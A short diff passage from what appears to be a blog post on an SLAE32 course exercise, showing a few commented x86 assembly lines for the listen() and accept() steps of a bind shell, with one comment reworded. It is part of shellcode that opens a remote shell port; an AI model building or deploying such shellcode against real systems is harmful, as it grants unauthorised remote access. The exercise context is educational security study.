boku7/boku7.github.io/_posts/2019-09-15-SLAE32_1_BindShell.md

 mov ecx, esp     ; Point ECX to the top of the stack. int 0x80         ; Executes listen().
 Allowing us to handle incoming TCP-IP Connections.

 ; 5.
-Accept the incoming connections, on the TCP-IP Socket, and create a new connected session.
+Accept the incoming connection, and create a connected session.
 ; <socketcall>   clientSocket = accept( ipv4Socket, NULL, NULL );
 ;   EAX=0x66                     EBX     ECX[0]    ECX[1] ECX[2]
 xor eax, eax     ; This sets the EAX Register to NULL (all zeros).